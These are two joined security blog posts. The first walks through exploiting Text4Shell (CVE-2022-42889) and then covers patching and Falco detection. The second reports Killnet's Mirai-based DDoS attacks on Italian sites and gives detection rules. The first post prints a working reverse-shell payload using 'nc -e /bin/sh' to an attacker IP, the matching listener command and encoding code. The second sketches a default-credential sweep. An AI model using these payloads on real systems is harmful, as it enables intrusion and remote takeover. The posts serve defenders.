It is important to specify that the StringSubstitutor interpolator is not as widely used as the string substitution in Log4j, which led to Log4Shell.

How to exploit CVE-2022-42889

To reproduce the attack, we deployed the vulnerable component in a Docker container, accessible from an attacker-controlled EC2 instance. Using the netcat (nc) command, we can open a reverse shell connection with the vulnerable application.

The vulnerable web application exposes a search API in which the query gets interpolated via the StringSubstitutor of Commons Text:

http://web.app/text4shell/attack?search=<query>

The following payload could be used to exploit the vulnerability and open a reverse shell:

${script:javascript:java.lang.Runtime.getRuntime().exec('nc 192.168.49.1 9090 -e /bin/sh')}

This payload is composed of “${prefix:name}”, which triggers the String Lookup. As mentioned above, “script”, “dns” and “url” are the keys that can be used as the prefix to exploit the vulnerability.

Before sending the crafted request, we need to set up the reverse shell connection using the netcat (nc) command to listen on port 9090.

nc -nlvp 9090

We can now send the crafted request, URL encoding the payload, as shown below.
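As an illustrative sketch (using the example host, path, and payload from above), the encoded request can be built by URL-encoding the payload before placing it in the search parameter:

```python
from urllib.parse import quote

# The reverse-shell payload from the example above; every reserved
# character must be percent-encoded before it goes into the query string.
payload = ("${script:javascript:java.lang.Runtime.getRuntime()"
           ".exec('nc 192.168.49.1 9090 -e /bin/sh')}")
url = "http://web.app/text4shell/attack?search=" + quote(payload, safe="")
```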

[Image: curl request sending the URL-encoded Text4Shell payload]

We can see that the attacker successfully opened a connection with the vulnerable application.

[Image: netcat listener receiving the reverse shell connection]

Now the attacker can interact with the vulnerable machine as root and execute arbitrary code.

The impact of CVE-2022-42889

According to the CVSSv3 scoring system, it rates 9.8, a CRITICAL severity.
The severity is critical due to the ease of exploitation and the potential impact on confidentiality, integrity, and availability. As we showed in the previous section, with a crafted request an attacker can take full control of the vulnerable system.
However, it is unlikely this vulnerability will have the same impact as the earlier Log4Shell and Spring4Shell.
Looking at the vulnerable component, the likelihood of exploitation depends on how the Apache Commons Text library is used. Specifically, exploitation is only possible if the application passes user-controlled input to a StringSubstitutor interpolator. This implementation is not as common in production environments as the vulnerable string substitution in Log4j. Therefore, the large-scale impact of Text4Shell is not really comparable to Log4Shell.

Detecting and Mitigating CVE-2022-42889

If you’re impacted by CVE-2022-42889, you should update Apache Commons Text to version 1.10.

As with the previous CVE-2022-22963, we can detect this vulnerability at three different phases of the application lifecycle:

  • Build process: With an image scanner.
  • Deployment process: Thanks to an image scanner on the admission controller.
  • Runtime detection phase: Detect post-exploitation behaviors in already deployed hosts or pods with Falco, a runtime detection engine.

Once the attacker has total control, Falco can detect their subsequent actions with one rule or another, depending on what they do. If the attacker opens a reverse shell, the following rule would detect it. To avoid false positives, you can add exceptions in the condition to better adapt it to your environment.

- rule: Reverse shell
  desc: Detect reverse shell established remote connection
  condition: evt.type=dup and container and fd.num in (0, 1, 2) and fd.type in ("ipv4", "ipv6")
  output: >
    Reverse shell connection (user=%user.name %container.info process=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip)
  priority: WARNING
  tags: [container, shell, mitre_execution]
  append: false

Using the Sysdig image scanner, it’s possible to detect the vulnerable package:

[Image: Sysdig scanner flagging the vulnerable Apache Commons Text package]

Conclusion

Even though CVE-2022-42889 is only exploitable under specific conditions, which makes it less widespread than the other major vulnerabilities seen this year, it’s still important to take immediate action.

To be safe, patch to the latest version to mitigate the vulnerability and use scanners to find out if you are affected. It’s also important to take the necessary mitigation measures and to never stop monitoring your infrastructure and applications at runtime.


If you want to know more, dig deeper with our article What is a Vulnerability:


Killnet cyber attacks against Italy and NATO countries https://sysdig.com/blog/killnet-italy-and-nato/ Wed, 18 May 2022 12:27:29 +0000 https://sysdig.com/?p=50504 On May 11, several Italian institutional websites, including the Italian Senate, the Ministry of Defense, and the National Institute of...

The post Killnet cyber attacks against Italy and NATO countries appeared first on Sysdig.

On May 11, several Italian institutional websites, including the Italian Senate, the Ministry of Defense, and the National Institute of Health, were taken offline and unreachable for a few hours. This was day one of a multiday cyber attack, which targeted other Italian websites as well as other countries. The pro-Russian hacker groups Killnet and Legion claimed the attacks through their Telegram channels, killnet_channel and legion_russia, and used the Mirai malware to perform their DDoS (distributed denial-of-service) attacks to Italian websites.

If confirmed, this would be the first claimed attack against Italy from pro-Russian cyber groups since the beginning of the war in Ukraine.

The Sysdig Threat Research Team has been collecting and monitoring data about the Mirai group and similar Mirai-based malware for some time. In the last 90 days, we monitored more than 1,000 attacks from different types of malware based on Mirai.

In this article, we cover what happened through the declarations of the parties involved. We will also provide context to the Mirai botnet and explain how it is possible to detect Mirai activities through Falco, the CNCF runtime security tool.

The threat actor Killnet

Killnet has been operating as a threat actor since the beginning of 2022. The Killnet Telegram channel was created on Jan. 23, 2022, and the Legion channel was launched four months later, on April 28. Based on communications on the Killnet channel, it seems that Legion is a subgroup of Killnet.

Before targeting Italy, over the past few months, they have targeted government and private companies in other countries, including the United States, Estonia, Latvia, Germany, Poland, Czech Republic, and Ukraine. Their choice of targets makes it clear that they are focused on countries that oppose Russia.

We can retrieve other information about Killnet from an interview with their founder, published on April 22. The founder, known as killmilk, said, “Killnet originally appeared as a service on the dark web.” When the conflict in Ukraine started, they decided to stop the commercial use of their botnet to support the fight against Ukraine and NATO countries, without actually stealing “money even from their enemies.” During the interview, he also said that their targets are “only those who are the conductor of evil and aggression, and we do not touch the civilian population.”

According to Killnet, the botnet they use for their attacks is composed mostly of foreign devices (only 6% are Russian machines), and they are financed by enthusiasts and patriots who “have nothing to do with the authorities.”

Speaking of funding, on March 3, Killnet published some cryptocurrency addresses in their official channel, asking for financial support, as shown below.

[Image: Killnet’s Telegram post listing cryptocurrency addresses]

By checking those addresses, it is possible to verify the amount of money they have received (at the time of this writing):

The main modus operandi of Killnet, Legion, and similar groups is to create a botnet of hundreds of thousands of machines infected with the famous Mirai malware and to use it to perpetrate DDoS attacks.

What is the Mirai Botnet?

The Mirai malware has been responsible for many large-scale DDoS attacks since 2016. Its main targets are Internet of Things (IoT) devices because, for years, their default configurations were not sufficiently secure, and most of the IoT devices exposed on the internet still ran with those defaults.
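Conceptually, a Mirai-style scanner needs nothing more than a short dictionary of factory credentials to take over such devices. The sketch below is purely illustrative: the credential pairs and function names are ours, not Mirai’s actual list:

```python
# Generic example factory credentials (illustrative, not Mirai's real list).
DEFAULT_CREDS = [("admin", "admin"), ("root", "root"), ("root", "12345")]

def device_is_exposed(accepts_login):
    """accepts_login: callable(user, password) -> bool, modeling a
    device's telnet/SSH login check. A device still running factory
    credentials falls to a trivial dictionary sweep."""
    return any(accepts_login(u, p) for u, p in DEFAULT_CREDS)
```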

[Image: diagram of the Mirai botnet]

Since 2016, the botnet of IoT devices infected with Mirai has hit several popular websites in several countries, including GitHub, Twitter, Reddit, Netflix, and Airbnb, costing hundreds of millions of dollars.

Since the Mirai group published their malware source code on Hack Forums, many cybercriminals have downloaded it and reused the same techniques to create other malware. Some variants target specific zero-day vulnerabilities, others target embedded processors or hijack cryptocurrency mining operations, as we discussed recently on our blog.

Well-prepared cyber groups can customize the Mirai malware in order to keep it updated with the most recent vulnerabilities.

What happened? Killnet attacks in detail

Killnet’s attacks succeeded in making the websites of some Italian institutions unreachable. Also, they targeted the Eurovision voting system and the websites of some German and Polish companies, although those attacks were mitigated.

Let’s try to summarize the events that have happened so far.

  • May 11, 2022
    • 16:49 CET – Legion posted a list of Italian websites hit by their DDoS attack
    • 17:57 CET – Legion posted a list of Polish and German websites that were going to be the next target
  • May 12, 2022
    • 3:42 CET – Legion posted another list of Italian websites that went unreachable
    • 11:30 CET – Killnet informed that they did “military cyber exercises,” and that they “will go on the offensive” as soon as the training finishes
  • May 14, 2022
    • 22:48 CET – Legion incited their supporters to perform a DDoS attack towards the Eurovision voting system
  • May 15, 2022
    • 7:51 CET – The Italian State Police informed the public in a tweet that they thwarted a cyber attack against Eurovision
    • 22:48 CET – Killnet posted a video where they declared cyber war on 10 countries
  • May 16, 2022
    • 1:29 CET – Killnet claimed a DDoS attack against the website of the Italian State Police
  • May 17, 2022
    • 4:06 CET – Killnet claimed another DDoS attack against the Italian State Police website

Let’s see in detail what happened using information collected from the threat group official telegram chats.

  • May 11 at 16:49 CET – It all started when Legion posted a list of Italian websites that were verified to be unreachable. The translated title of their message is ‘Squad “Mirai” Beat and beats only commander Mirai Attack on Italy.’
[Image: Legion’s post listing the Italian websites hit by the attack]

A few minutes later, Killnet posted the following message warning about next activities:

[Image: Killnet’s warning about upcoming activities against Italy and Spain]
  • May 11 at 17:57 CET – Legion posted another message with a list of Polish and German websites that were going to be the next target of another cyber group called Jacky. The message title is ‘Squad “Jacky” Hitting these sites. Anyone who wants to help.’
[Image: Legion’s post listing Polish and German targets]
  • May 11 at about 20:00 CET – All the Italian targets that had been hit were restored.
  • May 12 at 2:35 CET – Killnet confirmed that the attack to the previously listed websites was performed by Legion, which seems to be a subgroup of Killnet.
[Image: Killnet’s confirmation that the attack was performed by Legion]
  • May 12 at 3:42 CET – Legion posted another short list of Italian websites that went unreachable, including the Senate website. This message was titled ‘Demonstrative Attack on the network infrastructure of Italy from the commander of the detachment “MIRAI.”’
[Image: Legion’s post about the demonstrative attack on Italian network infrastructure]
  • May 12 at 11:30 CET – Killnet claimed some attacks, too. Actually, Killnet specified that they did not attack, but that these were “military cyber exercises,” and that they “will go on the offensive” against Italy and Spain as soon as the training finishes.
[Image: Killnet’s message describing the “military cyber exercises”]
  • May 14 at 22:48 CET – Legion incited their supporters to perform a DDoS attack towards the Eurovision voting system, giving some advice about how to proceed.
[Image: Legion inciting supporters to attack the Eurovision voting system]
  • May 15 at 7:51 CET – The Italian State Police released a tweet that they thwarted a cyber attack against Eurovision.
  • May 15 at 22:48 CET – Killnet posted a video where they declared cyber war on 10 countries: US, UK, Germany, Italy, Latvia, Romania, Lithuania, Estonia, Poland, and Ukraine.
[Image: Killnet’s video declaring cyber war on 10 countries]
  • May 16 at 1:29 CET – Killnet responded ironically to the previous tweet and posted an image of what appears to be the website of the Italian State Police being hit by a DDoS attack.
[Image: screenshot of the Italian State Police website under DDoS]

After one hour, as shown below, Killnet announced that they did not attack the Eurovision website and confirmed their war declaration, including the Italian State Police among the targets.

[Image: Killnet confirming their war declaration, including the Italian State Police]
  • May 17 at 4:06 CET – Killnet claimed another DDoS attack against the website of the Italian State Police. They added that ‘A full-scale Cyber ​​War has been going on for more than a day, we cannot publish 90% of our work. All the funniest moments will still pop up in the media, and here on the channel.’
[Image: Killnet claiming the attack on the Italian State Police website]

What we found about Mirai

The Sysdig Threat Research Team has collected and monitored data about the Mirai group and similar Mirai-based malware for some time. Over the last year, Mirai has been consistently active in our observations. In particular, in the last 90 days, we monitored more than 1,000 attacks from different types of malware based on Mirai.

[Image: chart of Mirai attack volume observed over the last year]

From the data collected, we can see a spike in Mirai attacks from the end of February until now. The conflict in Ukraine started on Feb. 24, as marked in the chart above. A correlation between these two events is likely and is supported by extensive reporting on DDoS attacks performed during these months.

Using the data collected, the Sysdig Threat Research Team designed new detection rules addressing these malicious behaviors to provide better detection with Falco.

Detecting Mirai using Falco

The following rules have proven useful in detecting the activities of Mirai-like malware:

- rule: Execution from /tmp
  desc: >
    This rule detects file execution from the /tmp directory, a common
    tactic for threat actors to stash their readable+writable+executable files.
  condition: >
    spawned_process and
    ((proc.exe startswith "/tmp/" or
      (proc.cwd startswith "/tmp/" and proc.exe startswith "./")) or
     (proc.cwd startswith "/tmp/" and proc.args contains "./"))
  output: "File execution detected from /tmp (proc.cmdline=%proc.cmdline)"
  priority: WARNING
  tags: [mitre_execution]

- macro: curl_download
  condition: >
    proc.name = curl and
    (proc.cmdline contains " -o " or
     proc.cmdline contains " --output " or
     proc.cmdline contains " -O " or
     proc.cmdline contains " --remote-name ")

- rule: Launch Ingress Remote File Copy Tools in Container
  desc: Detect ingress remote file copy tools launched in container
  condition: >
    spawned_process and
    container and
    (proc.name = wget or curl_download) and
    not user_known_ingress_remote_file_copy_activities
  output: >
    Ingress remote file copy tool launched in container
    (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline
    parent_process=%proc.pname container_id=%container.id
    container_name=%container.name
    image=%container.image.repository:%container.image.tag)
  priority: NOTICE
  tags: [network, process, mitre_command_and_control]

- rule: Write below root
  desc: An attempt to write to any file directly below / or /root
  condition: >
    root_dir and evt.dir = < and open_write and proc_name_exists and
    not exe_running_docker_save and not zap_writing_state and
    not maven_writing_groovy and not kubectl_writing_state and
    not cassandra_writing_state and not calico_writing_state and
    not rancher_writing_root and not runc_writing_exec_fifo and
    not user_known_write_root_conditions and
    not user_known_write_below_root_activities
  output: >
    File below / or /root opened for writing (user=%user.name
    user_loginuid=%user.loginuid command=%proc.cmdline parent=%proc.pname
    file=%fd.name program=%proc.name container_id=%container.id
    image=%container.image.repository)
  priority: ERROR
  tags: [mitre_persistence]
Reference for “Write below root” where the full definition can be found: https://github.com/falcosecurity/falco/blob/master/rules/falco_rules.yaml#L1332

To avoid false positives, you can add exceptions in the condition to better adapt to your environment.

Conclusion

The kinds of cyber attacks that we’ve seen recently are not new techniques. What is new is the fact that these attacks were brought about by the political context of the current war between Russia and Ukraine.

The fact that those attacks managed to disrupt the network services of institutional servers implies that the Italian government and other institutions are not adequately prepared for these attacks, which can become increasingly impactful if we don’t manage to reinforce our web infrastructures.

However, we are far from calling this a cyber war, and it is important not to overstate the terms we use to describe these events. Instead, we should create awareness of cybersecurity through consistent and truthful information. Indeed, the communication aspect should not be underestimated.

Misinformation weakens our defenses against future attacks. Transparent communication of incidents by the parties involved would help increase general awareness of cyber attacks, and that is fundamental to preventing them.

